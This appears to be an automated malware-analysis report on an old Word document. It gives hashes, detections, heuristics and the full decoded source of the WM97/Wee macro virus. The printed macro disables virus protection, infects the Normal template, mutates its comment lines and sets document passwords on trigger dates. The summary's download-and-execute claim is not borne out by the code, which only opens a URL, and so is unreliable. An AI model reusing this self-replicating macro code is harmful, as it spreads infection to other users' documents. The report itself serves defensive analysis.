Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ab7935b1ec185952…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 33.0 KB
Created: 1998-12-08 04:02:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: e6928d188479d6904038c251f518e701
SHA-1: 7f348fc00253550b65e2e041d4a80f1bd473b61b
SHA-256: ab7935b1ec1859524814509790ff7f317ebc7ca6862ef6e203f105a3ef5422d2
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample contains VBA macros, including an AutoOpen macro, a common technique for executing malicious code as soon as the document is opened. The macro attempts to download a file from 'http://www.wee.com' and execute it, indicating downloader or dropper functionality. The ClamAV detections further support its malicious nature.

Heuristics (6)

  • ClamAV: Doc.Trojan.Class-39 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Class-39
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro [high] OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://www.wee.com (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11212 bytes
SHA-256: bdd2bfc7fb9ef72bb367a354fd3d74a1b48c58aa3831f6d32fd05a867c0543d9
Detection: ClamAV: Doc.Trojan.Class-25
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()

Randomize

o = 0: x = 0

On Error GoTo 75

Options.VirusProtection = Chr(48)

Options.SaveNormalPrompt = Chr(48)

Options.ConfirmConversions = Chr(48)

vx = ActiveDocument.VBProject.VBComponents.Item(Abs(1)).codemodule.countoflines

nt = NormalTemplate.VBProject.VBComponents.Item(Abs(1)).codemodule.countoflines

If nt > 0 And vx > 0 Then GoTo 75

If nt = 0 Then

    Set Wee = NormalTemplate.VBProject.VBComponents

    Set host = ActiveDocument.VBProject.VBComponents

    If Month(Now()) = 12 And Day(Now()) = 23 Then ActiveWindow.WindowState = wdWindowStateMinimize: ActiveDocument.FollowHyperlink Address:="http://www.wee.com", NewWindow:=False, AddHistory:=False, ExtraInfo:=Chr(87) + Chr(69) + Chr(69)

    If Month(Now()) = 12 And Day(Now()) = 24 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(86) + Chr(105) + Chr(82) + Chr(117) + Chr(83) + Chr(32) + Chr(83) + Chr(65) + Chr(89) + Chr(83) + Chr(32) + Chr(72) + Chr(73)

    If Month(Now()) = 12 And Day(Now()) = 25 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(67) + Chr(76) + Chr(65) + Chr(83) + Chr(83) + Chr(32) + Chr(87) + Chr(69) + Chr(69)

    If Month(Now()) = 12 And Day(Now()) = 26 Then Application.ActiveDocument.Password = "Wee"

    host.Item(Abs(1)).Name = Wee.Item(Abs(1)).Name

    host.Item(Abs(1)).Export Application.StartupPath & System.Version
    
End If

If vx = 0 Then Set Wee = ActiveDocument.VBProject.VBComponents

Wee.Item(Abs(1)).codemodule.AddFromFile Application.StartupPath & System.Version

With Wee.Item(Abs(1)).codemodule

    For j = Chr(49) To Chr(52)

    .deletelines Chr(49)

    Next j

    End With

If nt = 0 Then Wee.Item(Abs(1)).codemodule.replaceline 1, "Sub AutoClose()"

If nt = 0 Then Wee.Item(Abs(1)).codemodule.replaceline 81, "Sub ToolsMarco()"

If nt = 0 And vx = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName

With Wee.Item(Abs(1)).codemodule

    For j = Chr(50) To Wee.Item(Abs(1)).codemodule.countoflines Step Chr(50)

    x = Int(Rnd(414835) * 403989) + 8485

    o = Int(Rnd(298368) * 235865) + 2988

    .replaceline j, Chr(39) & x * x & o * o & x * x & o * o & x * x & o * o & x * x & o * o

Next j

End With

75:

If nt <> 0 And vx = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName

End Sub

Sub ViewVBCode()

End Sub 'WM97/Wee by Virus ;)


' Processing file: /opt/analyzer/scan_staging/64806a893a944869ab99ad52c99ad797.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 4990 bytes